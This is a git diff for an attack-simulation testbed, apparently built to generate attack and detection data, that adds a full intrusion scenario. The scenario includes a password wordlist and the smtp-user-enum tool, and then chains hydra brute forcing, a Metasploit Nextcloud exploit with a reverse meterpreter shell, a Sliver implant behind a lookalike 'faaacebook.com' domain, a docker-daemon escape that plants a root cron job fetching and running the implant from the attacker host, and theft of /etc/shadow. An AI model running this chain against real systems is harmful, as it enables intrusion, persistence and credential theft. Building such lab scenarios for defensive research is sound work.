diff --git a/ansible/ansible.cfg b/ansible/ansible.cfg index e9c38d2a..4467753c 100644 --- a/ansible/ansible.cfg +++ b/ansible/ansible.cfg @@ -102,7 +102,7 @@ roles_path = $LOCAL_PACKAGE_ANSIBLE_PATH/roles #sudo_flags = -H -S -n # SSH timeout -#timeout = 10 +timeout = 30 # default user to use for playbooks if user is not specified # (/usr/bin/ansible will use current user as default) diff --git a/ansible/deploy/attacker/sliver.yml b/ansible/deploy/attacker/sliver.yml new file mode 100644 index 00000000..430fe15e --- /dev/null +++ b/ansible/deploy/attacker/sliver.yml @@ -0,0 +1,7 @@ +- name: Install Attacker Host + become: true + hosts: 10.110.0.211 + roles: + - role: sliver + vars: + sliver_user: ubuntu diff --git a/ansible/run/scenario7/files/smtp-pass.txt b/ansible/run/scenario7/files/smtp-pass.txt new file mode 100644 index 00000000..d84486e6 --- /dev/null +++ b/ansible/run/scenario7/files/smtp-pass.txt @@ -0,0 +1,100 @@ +windows2000 14:18:03 [1906/1906] +3830182 +tristan01 +964123 +chrisp +0825 +445566a +witchy +thickness +020181 +polk +sexyback12 +ihateyou9 +nate01 +vivayo +alex1972 +mimi88 +JENNY +01071975 +235 +akoako +zztop +courtney22 +01011959 +punk14 +loser17 +applejack1 +18111976 +spencer13 +841015 +meeko +becca2 +rockhopper +skyliner33 +amanda86 +071198 +iloveyou97 +bullshit7 +homie12 +djeter +chick2 +gupta +cowboy88 +22041977 +mxyzptlk +arsch123 +dsadsadsa +11111p +chinaman1 +sparky101 +holly22 +panthers13 +michael84 +arcticcat +mcbride +poopdick +200375 +cowboy88 +22041977 +mxyzptlk +arsch123 +dsadsadsa +11111p +chinaman1 +sparky101 +holly22 +panthers13 +michael84 +arcticcat +mcbride +alice123alice! +200375 +170876 +richman1 +acuario1 +jayann +30091978 +nguyen4 +COWBOYS +ttt111 +milan7 +loveday +TINKERBELL +utythfk +15011977 +kieran123 +bike4life +3690 +lisa14 +nicolina +duke07 +199308 +internet01 +851210 +usher2 +burnley1 +170376 +akmaral +811023 +charing diff --git a/ansible/run/scenario7/files/smtp-user-enum.pl b/ansible/run/scenario7/files/smtp-user-enum.pl new file mode 100755 index 00000000..5c9e4f3d --- /dev/null +++ b/ansible/run/scenario7/files/smtp-user-enum.pl @@ -0,0 +1,411 @@ +#!/usr/bin/perl -w +# smtp-user-enum - Brute Force Usernames via EXPN/VRFY/RCPT TO +# Copyright (C) 2008 pentestmonkey@pentestmonkey.net +# +# This program is free software; you can redistribute it and/or modify +# it under the terms of the GNU General Public License version 2 as +# published by the Free Software Foundation. +# +# This program is distributed in the hope that it will be useful, +# but WITHOUT ANY WARRANTY; without even the implied warranty of +# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the +# GNU General Public License for more details. +# +# You should have received a copy of the GNU General Public License along +# with this program; if not, write to the Free Software Foundation, Inc., +# 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301 USA. +# +# This tool may be used for legal purposes only. Users take full responsibility +# for any actions performed using this tool. If these terms are not acceptable to +# you, then do not use this tool. +# +# You are encouraged to send comments, improvements or suggestions to +# me at smtp-user-enum@pentestmonkey.net +# +# This program is derived from dns-grind v1.0 ( http://pentestmonkey.net/tools/dns-grind ) +# + +use strict; +use Socket; +use IO::Handle; +use IO::Select; +use IO::Socket::INET; +use Getopt::Std; +$| = 1; + +my $VERSION = "1.2"; +my $debug = 0; +my @child_handles = (); +my $verbose = 0; +my $max_procs = 5; +my $smtp_port = 25; +my @usernames = (); +my @hosts = (); +my $recursive_flag = 1; +my $query_timeout = 5; +my $mode = "VRFY"; +my $from_address = 'user@example.com'; +my $start_time = time(); +my $end_time; +my $kill_child_string = "\x00"; +$SIG{CHLD} = 'IGNORE'; # auto-reap +my %opts; +my $usage=<; +} + +if (defined($host_file)) { + open(FILE, "<$host_file") or die "ERROR: Can't open username file $host_file: $!\n"; + @hosts = map { chomp($_); $_ } ; +} + +if (defined($username)) { + push @usernames, $username; +} + +if (defined($host)) { + push @hosts, $host; +} + +if (defined($host_file) and not @hosts) { + print "ERROR: Targets file $host_file was empty\n"; + exit 1; +} + +if (defined($username_file) and not @usernames) { + print "ERROR: Username file $username_file was empty\n"; + exit 1; +} + +print "Starting smtp-user-enum v$VERSION ( http://pentestmonkey.net/tools/smtp-user-enum )\n"; +print "\n"; +print " ----------------------------------------------------------\n"; +print "| Scan Information |\n"; +print " ----------------------------------------------------------\n"; +print "\n"; +print "Mode ..................... $mode\n"; +print "Worker Processes ......... $max_procs\n"; +print "Targets file ............. $host_file\n" if defined($host_file); +print "Usernames file ........... $username_file\n" if defined($username_file); +print "Target count ............. " . scalar(@hosts) . "\n" if @hosts; +print "Username count ........... " . scalar(@usernames) . "\n" if @usernames; +print "Target TCP port .......... $smtp_port\n"; +print "Query timeout ............ $query_timeout secs\n"; +print "Target domain ............ $domain\n" if defined($domain); +print "\n"; +print "######## Scan started at " . scalar(localtime()) . " #########\n"; + +# Spawn off correct number of children +foreach my $proc_count (1..$max_procs) { + socketpair(my $child, my $parent, AF_UNIX, SOCK_STREAM, PF_UNSPEC) or die "socketpair: $!"; + $child->autoflush(1); + $parent->autoflush(1); + + # Parent executes this + if (my $pid = fork) { + close $parent; + print "[Parent] Spawned child with PID $pid to do resolving\n" if $debug; + push @child_handles, $child; + + # Child executes this + } else { + close $child; + while (1) { + my $timed_out = 0; + + # Read host and username from parent + my $line = <$parent>; + chomp($line); + my ($host, $username, $domain) = $line =~ /^(\S+)\t(.*)\t(.*)$/; + + # Append domain to username if a domain was supplied + $username = $username . "@" . $domain if (defined($domain) and $domain); + + # Exit if told to by parent + if ($line eq $kill_child_string) { + print "[Child $$] Exiting\n" if $debug; + exit 0; + } + + # Sanity check host and username + if (defined($host) and defined($username)) { + print "[Child $$] Passed host $host and username $username\n" if $debug; + } else { + print "[Child $$] WARNING: Passed garbage. Ignoring: $line\n"; + next; + } + + # Do smtp query with timeout + my $response; + eval { + local $SIG{ALRM} = sub { die "alarm\n" }; + alarm $query_timeout; + my $s = IO::Socket::INET->new( PeerAddr => $host, + PeerPort => $smtp_port, + Proto => 'tcp' + ) + or die "Can't connect to $host:$smtp_port: $!\n"; + my $buffer; + $s->recv($buffer, 10000); # recv banner + if ($mode eq "VRFY") { + $s->send("HELO x\r\n"); + $s->recv($buffer, 10000); + $s->send("VRFY $username\r\n"); + $s->recv($buffer, 10000); + } elsif ($mode eq "EXPN") { + $s->send("HELO x\r\n"); + $s->recv($buffer, 10000); + $s->send("EXPN $username\r\n"); + $s->recv($buffer, 10000); + } elsif ($mode eq "RCPT") { + $s->send("HELO x\r\n"); + $s->recv($buffer, 10000); + $s->send("MAIL FROM:$from_address\r\n"); + $s->recv($buffer, 10000); + $s->send("RCPT TO:$username\r\n"); + $s->recv($buffer, 10000); + } else { + print "ERROR: Unknown mode in use\n"; + exit 1; + } + $response .= $buffer; + alarm 0; + }; + +# if ($@) { +# $timed_out = 1; +# print "[Child $$] Timeout for username $username on host $host\n" if $debug; +# } + + my $trace; + if ($debug) { + $trace = "[Child $$] $host: $username "; + } else { + $trace = "$host: $username "; + } + + if ($response and not $timed_out) { + + # Negative result + if ($response =~ /5\d\d \S+/s) { + print $parent $trace . "\n"; + next; + + # Postive result + } elsif ($response =~ /2\d\d \S+/s) { + print $parent $trace . "exists\n"; + next; + + # Unknown response + } else { + $response =~ s/[\n\r]/./g; + print $parent $trace . "$response\n"; + next; + } + } + + if ($timed_out) { + print $parent $trace . "\n"; + } else { + if (!$response) { + print $parent $trace . "\n"; + } + } + } + exit; + } +} + +# Fork once more to make a process that will us usernames and hosts +socketpair(my $get_next_query, my $parent, AF_UNIX, SOCK_STREAM, PF_UNSPEC) or die "socketpair: $!"; +$get_next_query->autoflush(1); +$parent->autoflush(1); + +# Parent executes this +if (my $pid = fork) { + close $parent; + +# Chile executes this +} else { + # Generate queries from username-host pairs and send to parent + foreach my $username (@usernames) { + foreach my $host (@hosts) { + my $query = $host . "\t" . $username . "\t" . $domain; + print "[Query Generator] Sending $query to parent\n" if $debug; + print $parent "$query\n"; + } + } + + exit 0; +} + +printf "Created %d child processes\n", scalar(@child_handles) if $debug; +my $s = IO::Select->new(); +my $s_in = IO::Select->new(); +$s->add(@child_handles); +$s_in->add(\*STDIN); +my $timeout = 0; # non-blocking +my $more_queries = 1; +my $outstanding_queries = 0; +my $query_count = 0; +my $result_count = 0; + +# Write to each child process once +writeloop: foreach my $write_handle (@child_handles) { + my $query = <$get_next_query>; + if ($query) { + chomp($query); + print "[Parent] Sending $query to child\n" if $debug; + print $write_handle "$query\n"; + $outstanding_queries++; + } else { + print "[Parent] Quitting main loop. All queries have been read.\n" if $debug; + last writeloop; + } +} + +# Keep reading from child processes until there are no more queries left +# Write to a child only after it has been read from +mainloop: while (1) { + # Wait until there's a child that we can either read from or written to. + my ($rh_aref) = IO::Select->select($s, undef, undef); # blocking + + print "[Parent] There are " . scalar(@$rh_aref) . " children that can be read from\n" if $debug; + + foreach my $read_handle (@$rh_aref) { + # Read from child + chomp(my $line = <$read_handle>); + if ($verbose == 1 or $debug == 1 or not ($line =~ // or $line =~ /no result/ or $line =~ //)) { + print "$line\n"; + $result_count++ unless ($line =~ // or $line =~ /no result/ or $line =~ //); + } + $outstanding_queries--; + $query_count++; + + # Write to child + my $query = <$get_next_query>; + if ($query) { + chomp($query); + print "[Parent] Sending $query to child\n" if $debug; + print $read_handle "$query\n"; + $outstanding_queries++; + } else { + print "DEBUG: Quitting main loop. All queries have been read.\n" if $debug; + last mainloop; + } + } +} + +# Wait to get replies back from remaining children +my $count = 0; +readloop: while ($outstanding_queries) { + my @ready_to_read = $s->can_read(1); # blocking + foreach my $child_handle (@ready_to_read) { + print "[Parent] Outstanding queries: $outstanding_queries\n" if $debug; + chomp(my $line = <$child_handle>); + if ($verbose == 1 or $debug == 1 or not ($line =~ // or $line =~ /no result/ or $line =~ //)) { + print "$line\n"; + $result_count++ unless ($line =~ // or $line =~ /no result/ or $line =~ //); + } + print $child_handle "$kill_child_string\n"; + $s->remove($child_handle); + $outstanding_queries--; + $query_count++; + } +} + +# Tell any remaining children to exit +foreach my $handle ($s->handles) { + print "[Parent] Telling child to exit\n" if $debug; + print $handle "$kill_child_string\n"; +} + +# Wait for all children to terminate +while(wait != -1) {}; + +print "######## Scan completed at " . scalar(localtime()) . " #########\n"; +print "$result_count results.\n"; +print "\n"; +$end_time = time(); # Second granularity only to avoid depending on hires time module +my $run_time = $end_time - $start_time; +$run_time = 1 if $run_time < 1; # Avoid divide by zero +printf "%d queries in %d seconds (%0.1f queries / sec)\n", $query_count, $run_time, $query_count / $run_time; diff --git a/ansible/run/scenario7/files/smtp-user.txt b/ansible/run/scenario7/files/smtp-user.txt new file mode 100644 index 00000000..573755f5 --- /dev/null +++ b/ansible/run/scenario7/files/smtp-user.txt @@ -0,0 +1,21 @@ +david@attackbed.com +alex@attackbed.com +maria@attackbed.com +john@attackbed.com +marco@attackbed.com +andrea@attackbed.com +peter@attackbed.com +daniel@attackbed.com +cathy@attackbed.com +antonio@attackbed.com +bob@attackbed.com +roberta@attackbed.com +cedric@attackbed.com +cynthia@attackbed.com +paul@attackbed.com +alice@attackbed.com +dora@attackbed.com +admin@attackbed.com +james@attackbed.com +sales@attackbed.com +office@attackbed.com diff --git a/ansible/run/scenario7/gather.yml b/ansible/run/scenario7/gather.yml new file mode 100644 index 00000000..3c192522 --- /dev/null +++ b/ansible/run/scenario7/gather.yml @@ -0,0 +1,85 @@ +- hosts: inetfw + roles: + - kyoushi-gather + vars: + kyoushi_gather_ignore_errors: yes + kyoushi_gather_configs: + - src: /var/lib/suricata + recursive: true + - src: /etc + recursive: true + exclude: + - "/etc/runit " + - "/etc/sv " + - src: /var/ossec/etc/ossec.conf + + kyoushi_gather_logs: + - src: /var/log + recursive: true + + +- hosts: docker + roles: + - kyoushi-gather + vars: + kyoushi_gather_ignore_errors: yes + kyoushi_gather_logs: + - /opt/nextcloud/log + - /var/lib/docker/containers + recursive: true + - src: /var/log + recursive: true + + kyoushi_gather_configs: + - src: /etc + recursive: true + exclude: + - "/etc/runit " + - "/etc/sv " + - src: /opt/nextcloud + recursive: true + exclude: + - "/opt/nextcloud/dump.sql" + - "/opt/nextcloud/log" + - src: /var/ossec/etc/ossec.conf + + +- hosts: attacker + roles: + - kyoushi-gather + vars: + kyoushi_gather_ignore_errors: yes + kyoushi_gather_logs: + - /home/aecid/attackmate.log + - /home/aecid/output.log + - /home/aecid/attackmate.json + - src: /var/log + recursive: true + + kyoushi_gather_configs: + - src: /home/aecid/scenario*.yml + - src: /var/www/html + recursive: true + - src: /etc + recursive: true + exclude: + - "/etc/runit " + - "/etc/sv " + +- hosts: wazuh + roles: + - kyoushi-gather + vars: + kyoushi_gather_ignore_errors: yes + kyoushi_gather_logs: + - src: /var/ossec/logs/alerts + recursive: true + + kyoushi_gather_configs: + - src: /etc + recursive: true + exclude: + - "/etc/runit " + - "/etc/sv " + - src: /var/ossec/etc/shared + recursive: true diff --git a/ansible/run/scenario7/main.yml b/ansible/run/scenario7/main.yml new file mode 100644 index 00000000..6cfb5eb0 --- /dev/null +++ b/ansible/run/scenario7/main.yml @@ -0,0 +1,135 @@ + +- name: Retstart dnsmasq on inetdns + hosts: inetdns + become: true + tasks: + - name: stop dnsmasq + ansible.builtin.service: + name: dnsmasq + state: stopped + tags: + - playbooks + + - name: Configure public DNS + ansible.builtin.copy: + content: "address=/faaacebook.com/192.42.1.174\n" + owner: root + dest: /etc/dnsmasq.d/attacker.conf + # delegate_to: inetdns + tags: + - playbooks + + - name: start dnsmasq + ansible.builtin.service: + name: dnsmasq + state: started + tags: + - playbooks + +- name: Install Attacker Host + hosts: attacker + become: true + vars: + attacker_user: aecid + attacker_ip: 192.42.1.174 + tasks: + - name: get user home directory + ansible.builtin.shell: > + getent passwd {{ attacker_user }} | awk -F: '{ print $6 }' + changed_when: false + register: user_home + tags: + - metasploit + - exploit + - config + - install + - git + - attackmate + - playbooks + + - name: Ensure delay before commands + ansible.builtin.replace: + path: /etc/attackmate.yml + regexp: 'command_delay: 0' + replace: 'command_delay: 15' + backup: yes + become: true + tags: + - playbooks + + +- name: Install Attacker Host Part 2 + hosts: attacker + become: true + vars: + attacker_user: aecid + attacker_ip: 192.42.1.174 + # delay_before_attack: 600 + delay_before_attack: 0 + tasks: + - name: Install docker.io + apt: + name: docker.io + state: present + tags: + - playbooks + + - name: Copy smtp-enum + become: True + become_user: "{{attacker_user}}" + ansible.builtin.copy: + src: "smtp-user-enum.pl" + dest: "{{user_home.stdout}}/smtp-user-enum.pl" + mode: '0755' + tags: + - playbooks + + - name: Copy smtp-user-wordlist + become: True + become_user: "{{attacker_user}}" + ansible.builtin.copy: + src: "smtp-user.txt" + dest: "{{user_home.stdout}}/smtp-user.txt" + mode: '0744' + tags: + - playbooks + + - name: Copy smtp-pass-wordlist + become: True + become_user: "{{attacker_user}}" + ansible.builtin.copy: + src: "smtp-pass.txt" + dest: "{{user_home.stdout}}/smtp-pass.txt" + mode: '0744' + tags: + - playbooks + + + - name: Copy playbooks + become: True + become_user: "{{attacker_user}}" + ansible.builtin.template: + src: "{{ item }}.j2" + dest: "{{user_home.stdout}}/{{ item }}.yml" + mode: '0755' + loop: + - scenario_7 + tags: + - metasploit + - attackmate + - exploit + - config + - install + - playbooks + + - name: "Run Scenario 7" + become: True + become_user: "{{attacker_user}}" + ansible.builtin.shell: + cmd: "sleep {{delay_before_attack}} && /usr/local/bin/attackmate-tmux \"--json\" scenario_7.yml" + chdir: "{{user_home.stdout}}" + tags: + - scenario_7 + - metasploit + - attackmate + - exploit diff --git a/ansible/run/scenario7/templates/scenario_7.j2 b/ansible/run/scenario7/templates/scenario_7.j2 new file mode 100755 index 00000000..724a756f --- /dev/null +++ b/ansible/run/scenario7/templates/scenario_7.j2 @@ -0,0 +1,186 @@ +#################### +# +# Scenario 7 +# +#################### +vars: + $SERVER_ADDRESS: 192.42.0.254 + $ATTACKER_ADDRESS: 192.42.1.174 + DOMAIN: attackbed.com + PAYLOAD_DOCKER: cmd/linux/http/x64/meterpreter/reverse_tcp + +commands: + - type: shell + cmd: ./smtp-user-enum.pl -M VRFY -U smtp-user.txt -t $SERVER_ADDRESS + metadata: + techniques: "T1589.002" + tactics: "Reconnaissance" + technique_name: "Gather Victim Identity Information: Email Addresses" + description: "Enumerate email addresses on SMTP-Host" + + - type: sleep + seconds: 30 + min_sec: 5 + random: true + + - type: shell + cmd: hydra -l "alice@$DOMAIN" -P smtp-pass.txt -c 5 -s 143 $SERVER_ADDRESS imap + metadata: + techniques: "T1078.002,T1110.001,T1133" + tactics: "Initial Access" + technique_name: "Valid Accounts: Local Accounts, Brute Force: Password Guessing, External Remote Services" + description: "Brute-force IMAP-password using the already enumerated username" + + - type: sleep + seconds: 30 + min_sec: 5 + random: true + + - type: http-client + url: http://$SERVER_ADDRESS:8080 + metadata: + techniques: "T1592.002" + tactics: "Reconnaissance" + technique_name: "Gather Victim Host Information: Software" + description: "Attacker connects to webport to find out about nextcloud" + + - type: sliver + cmd: "generate_implant" + c2url: "https://faaacebook.com" + name: "badimplant" + metadata: + description: "Generate implant for the persistence on the container-host" + + - type: sliver + cmd: start_https_listener + host: 0.0.0.0 + port: 443 + metadata: + techniques: "T1071.001,T1573.001" + tactics: "Command and Control" + technique_name: "Application Layer Protocol: Web Protocols,Encrypted Channel: Symmetric Cryptography" + description: "Start a listener for the sliver implant" + + - type: webserv + local_path: $LAST_SLIVER_IMPLANT + port: 8888 + background: True + kill_on_exit: true + metadata: + description: "Serve the sliver implant for installation" + + - type: msf-module + cmd: exploit/unix/webapp/nextcloud_workflows_rce + creates_session: "foothold" + options: + RHOSTS: "$SERVER_ADDRESS" + RPORT: "8080" + USERNAME: "alice" + PASSWORD: "alice123alice!" + WfsDelay: "8000" + payload_options: + LHOST: "192.42.1.174" + LPORT: "4444" + payload: "cmd/linux/http/x64/meterpreter/reverse_tcp" + metadata: + tactics: "Initial Access, Execution,Command and Control" + techniques: "T1190,T1059.004,T1095" + description: "Attacker exploits an authenticated vulnerability in nextcloud and executes a meterpreter shell" + + + - type: msf-session + session: "foothold" + stdapi: True + cmd: getuid + metadata: + techniques: "T1033" + tactics: "Discovery" + description: "Attacker discovers user id" + + - type: sleep + seconds: 30 + min_sec: 5 + random: true + + - type: msf-session + session: "foothold" + stdapi: True + cmd: portfwd add -l 1090 -p 2375 -r 172.18.0.1 + metadata: + description: "Attacker starts port-forwarding for further attacks on the exposed docker-daemon" + + - type: shell + cmd: docker -H tcp://localhost:1090 ps + metadata: + techniques: "T1057" + tactics: "Discovery" + description: "Attacker asks docker-daemon for running containers" + + - type: sleep + seconds: 30 + min_sec: 5 + random: true + + + - type: shell + cmd: docker -H tcp://localhost:1090 network list + metadata: + techniques: "T1016 " + tactics: "Discovery" + description: "Attacker discovers docker-networks using the exposed docker-daemon" + + - type: sleep + seconds: 30 + min_sec: 5 + random: true + + - type: shell + cmd: docker -H tcp://localhost:1090 run --rm -t -u root --network=nextcloud_default -v /etc:/root/etc kalilinux/kali-rolling bash -c "echo \"*/5 * * * * root test -e /opt/tool || curl http://$ATTACKER_ADDRESS:8888/tool > /opt/tool && chmod +x /opt/tool && /opt/tool\" > /root/etc/cron.d/sysvz" + metadata: + techniques: "T1610,T1525,T1053.003" + tactics: "Defense Evasion,Execution,Persistence,Privilege Escalation" + description: "Attacker mounts etc-directory of the host into a container and creates a cron-job in it that executes the sliver-implant as root outside of the container" + + + - type: sliver-session + cmd: ls + remote_path: "." + session: badimplant + metadata: + techniques: "T1083" + tactics: "Discovery" + technique_name: "File and Directory Discovery" + description: "Use sliver to list files after container-escape" + + - type: sleep + seconds: 30 + min_sec: 5 + random: true + + - type: sliver-session + cmd: ps + session: badimplant + metadata: + techniques: "T1057" + tactics: "Discovery" + technique_name: "Process Discovery" + description: "Use sliver to list processes after container-escape" + + - type: mktemp + variable: SHADOW + + - type: sleep + seconds: 30 + min_sec: 5 + random: true + + - type: sliver-session + cmd: download + remote_path: /etc/shadow + local_path: $SHADOW + session: badimplant + metadata: + techniques: "T1003.008,T1041" + tactics: "Credential Access,Collection,Exfiltration" + technique_name: "OS Credential Dumping: /etc/passwd and /etc/shadow,Exfiltration Over C2 Channel" + description: "Use sliver to dump /etc/shadow credentials" diff --git a/packer/attacker/playbook/main.yaml b/packer/attacker/playbook/main.yaml index 7cabf828..79964b08 100644 --- a/packer/attacker/playbook/main.yaml +++ b/packer/attacker/playbook/main.yaml @@ -56,13 +56,9 @@ vars: aecidtools_user: "{{attacker_user}}" - role: postexploit - - role: l50.sliver + - role: sliver vars: - server_path: "/home/{{attacker_user}}/sliver-server" - client_path: /usr/local/bin/sliver - sliver_service_path: /etc/systemd/system/sliver.service - sliver_client_config_path: "/home/{{attacker_user}}/.sliver-client/configs" - setup_systemd: true + server_user: "{{attacker_user}}" - role: metasploit vars: metasploit_user: "{{attacker_user}}" @@ -71,6 +67,7 @@ metasploit_rpcpassword: hackerman - role: attackmate vars: + attackmate_version: development attackmate_msf_server: "localhost" attackmate_msf_passwd: "hackerman" attackmate_sliver_config: "/home/aecid/.sliver-client/configs/aecid_localhost.cfg" @@ -96,4 +93,4 @@ ansible.builtin.lineinfile: path: /etc/resolv.conf regexp: '^nameserver 8\.8\.8\.8$' - state: absent \ No newline at end of file + state: absent diff --git a/packer/attacker/playbook/requirements.yml b/packer/attacker/playbook/requirements.yml index 000d07bb..9c47fc34 100644 --- a/packer/attacker/playbook/requirements.yml +++ b/packer/attacker/playbook/requirements.yml @@ -8,8 +8,9 @@ roles: - src: https://github.com/ait-testbed/atb-ansible-postexploit.git version: v1.2.3 name: postexploit - - name: l50.sliver - version: v1.0.1 + - name: sliver + version: v0.1.0 + src: https://github.com/ait-testbed/atb-ansible-sliver.git - src: https://github.com/ait-testbed/atb-ansible-aeciduser.git version: v1.0.0 name: aeciduser @@ -20,7 +21,7 @@ roles: version: v0.0.1 name: seclists - src: https://github.com/ait-testbed/attackmate-ansible.git - version: v1.2.0 + version: v1.4.0 name: attackmate - src: https://github.com/ait-testbed/ansible-manage_unattended_upgrades.git version: v1.0.0 diff --git a/packer/docker/playbook/main.yaml b/packer/docker/playbook/main.yaml index e01a7427..5a967bbc 100644 --- a/packer/docker/playbook/main.yaml +++ b/packer/docker/playbook/main.yaml @@ -16,7 +16,7 @@ - role: nextcloudrce vars: nextcloud_rce_start_container: false #Needed to prevent the start of containers at atb-ansible-nextcloudrce role before mail feature - nextcloud_rce_domain: "localhost:8080" + nextcloud_rce_domain: "192.42.0.254:8080" nextcloud_mail_image: "ghcr.io/ait-testbed/attackbed/nextcloud-mail:1.0.0" nextcloud_rce_docker_compose_template: "docker-compose-mail.yml.j2" - role: vulndockerd diff --git a/packer/firewall/playbook/main.yaml b/packer/firewall/playbook/main.yaml index c14a299c..290f2d0f 100644 --- a/packer/firewall/playbook/main.yaml +++ b/packer/firewall/playbook/main.yaml @@ -116,6 +116,8 @@ rules: - Cloud Ports - { action: DNAT, source: inet, dest: "dmz:$CLOUD", proto: tcp, dest_port: 8080 } + - { action: DNAT, source: inet, dest: "dmz:$CLOUD", proto: tcp, dest_port: 25 } + - { action: DNAT, source: inet, dest: "dmz:$CLOUD", proto: tcp, dest_port: 143 } - Videoserver Ports - { action: DNAT, source: inet, dest: "dmz:$VIDEOSERVER", proto: tcp, dest_port: 80 } - { action: DNAT, source: inet, dest: "dmz:$VIDEOSERVER:22", proto: tcp, dest_port: 2222 } diff --git a/terragrunt/attacker/terragrunt.hcl b/terragrunt/attacker/terragrunt.hcl index e8a84350..47a2c5c2 100644 --- a/terragrunt/attacker/terragrunt.hcl +++ b/terragrunt/attacker/terragrunt.hcl @@ -14,5 +14,5 @@ inputs = { include { - path = find_in_parent_folders() + path = find_in_parent_folders("root.hcl") } diff --git a/terragrunt/bootstrap/module/main.tf b/terragrunt/bootstrap/module/main.tf index 6aa02a5c..595bd3fd 100644 --- a/terragrunt/bootstrap/module/main.tf +++ b/terragrunt/bootstrap/module/main.tf @@ -6,6 +6,7 @@ locals { ext_dns_userdata_file = var.ext_dns_userdata == null ? "${path.module}/scripts/dns.yml" : var.ext_dns_userdata fw_userdata_file = var.fw_userdata == null ? "${path.module}/scripts/firewallinit.yml" : var.fw_userdata mgmt_userdata_file = var.mgmt_userdata == null ? "${path.module}/scripts/mgmtinit.yml" : var.mgmt_userdata + ext_dnsserver_userdata_file = var.corpdns_userdata == null ? "${path.module}/scripts/corpdns.yml" : var.corpdns_userdata } @@ -356,10 +357,6 @@ resource "openstack_networking_floatingip_associate_v2" "mgmt" { } -locals { - ext_dnsserver_userdata_file = var.dnsserver_userdata == null ? "${path.module}/scripts/corpdns.yml" : var.dnsserver_userdata -} - #################################################################### # # CREATE INSTANCE for "DNS-Server" @@ -381,13 +378,13 @@ data "template_cloudinit_config" "cloudinitdnsserver" { } data "openstack_images_image_v2" "dnsserver-image" { - name = var.dnsserver_image + name = var.corpdns_image most_recent = true } resource "openstack_compute_instance_v2" "dnsserver" { name = "corpdns" - flavor_name = var.dnsserver_flavor + flavor_name = var.corpdns_flavor key_pair = var.sshkey image_id = data.openstack_images_image_v2.dnsserver-image.id user_data = local.ext_dnsserver_userdata_file == null ? null : data.template_cloudinit_config.cloudinitdnsserver[0].rendered @@ -401,4 +398,4 @@ resource "openstack_compute_instance_v2" "dnsserver" { depends_on = [ openstack_networking_network_v2.internet, ] -} \ No newline at end of file +} diff --git a/terragrunt/bootstrap/module/variables.tf b/terragrunt/bootstrap/module/variables.tf index 08fdcf17..70d8eeff 100644 --- a/terragrunt/bootstrap/module/variables.tf +++ b/terragrunt/bootstrap/module/variables.tf @@ -64,20 +64,20 @@ variable "mgmt_flavor" { default = "d2-2" } -variable "dnsserver_image" { +variable "corpdns_image" { type = string - description = "image of the dnsserver host" + description = "image of the corpdns-server host" } -variable "dnsserver_flavor" { +variable "corpdns_flavor" { type = string - description = "flavor of the dnsserver host" + description = "flavor of the corpdns-server host" default = "d2-8" } -variable "dnsserver_userdata" { +variable "corpdns_userdata" { type = string - description = "Userdata for the dnsserver virtual machine" + description = "Userdata for the corpdns-server virtual machine" default = null } diff --git a/terragrunt/bootstrap/terragrunt.hcl b/terragrunt/bootstrap/terragrunt.hcl index 7af7c4f0..7b1ab876 100644 --- a/terragrunt/bootstrap/terragrunt.hcl +++ b/terragrunt/bootstrap/terragrunt.hcl @@ -19,5 +19,5 @@ inputs = { include { - path = find_in_parent_folders() + path = find_in_parent_folders("root.hcl") } diff --git a/terragrunt/client/terragrunt.hcl b/terragrunt/client/terragrunt.hcl index 9ecd877e..2c576e89 100644 --- a/terragrunt/client/terragrunt.hcl +++ b/terragrunt/client/terragrunt.hcl @@ -15,5 +15,5 @@ inputs = { include { - path = find_in_parent_folders() + path = find_in_parent_folders("root.hcl") } diff --git a/terragrunt/docker/terragrunt.hcl b/terragrunt/docker/terragrunt.hcl index bf55d24c..d025da65 100644 --- a/terragrunt/docker/terragrunt.hcl +++ b/terragrunt/docker/terragrunt.hcl @@ -14,5 +14,5 @@ inputs = { include { - path = find_in_parent_folders() + path = find_in_parent_folders("root.hcl") } diff --git a/terragrunt/lanturtle/terragrunt.hcl b/terragrunt/lanturtle/terragrunt.hcl index afa70140..929fee9a 100644 --- a/terragrunt/lanturtle/terragrunt.hcl +++ b/terragrunt/lanturtle/terragrunt.hcl @@ -16,5 +16,5 @@ inputs = { include { - path = find_in_parent_folders() + path = find_in_parent_folders("root.hcl") } diff --git a/terragrunt/logging/terragrunt.hcl b/terragrunt/logging/terragrunt.hcl index 8adf9bbb..99bf672b 100644 --- a/terragrunt/logging/terragrunt.hcl +++ b/terragrunt/logging/terragrunt.hcl @@ -16,5 +16,5 @@ inputs = { include { - path = find_in_parent_folders() + path = find_in_parent_folders("root.hcl") } diff --git a/terragrunt/repository/terragrunt.hcl b/terragrunt/repository/terragrunt.hcl index 4d21fd3d..de0905c6 100644 --- a/terragrunt/repository/terragrunt.hcl +++ b/terragrunt/repository/terragrunt.hcl @@ -14,5 +14,5 @@ inputs = { include { - path = find_in_parent_folders() + path = find_in_parent_folders("root.hcl") } diff --git a/terragrunt/terragrunt.hcl b/terragrunt/root.hcl similarity index 100% rename from terragrunt/terragrunt.hcl rename to terragrunt/root.hcl diff --git a/terragrunt/videoserver/terragrunt.hcl b/terragrunt/videoserver/terragrunt.hcl index a951bfd8..f35392a9 100644 --- a/terragrunt/videoserver/terragrunt.hcl +++ b/terragrunt/videoserver/terragrunt.hcl @@ -16,5 +16,5 @@ inputs = { include { - path = find_in_parent_folders() + path = find_in_parent_folders("root.hcl") } diff --git a/terragrunt/wazuh/terragrunt.hcl b/terragrunt/wazuh/terragrunt.hcl index 999c5ef7..8fcd1234 100644 --- a/terragrunt/wazuh/terragrunt.hcl +++ b/terragrunt/wazuh/terragrunt.hcl @@ -14,5 +14,5 @@ inputs = { include { - path = find_in_parent_folders() + path = find_in_parent_folders("root.hcl") }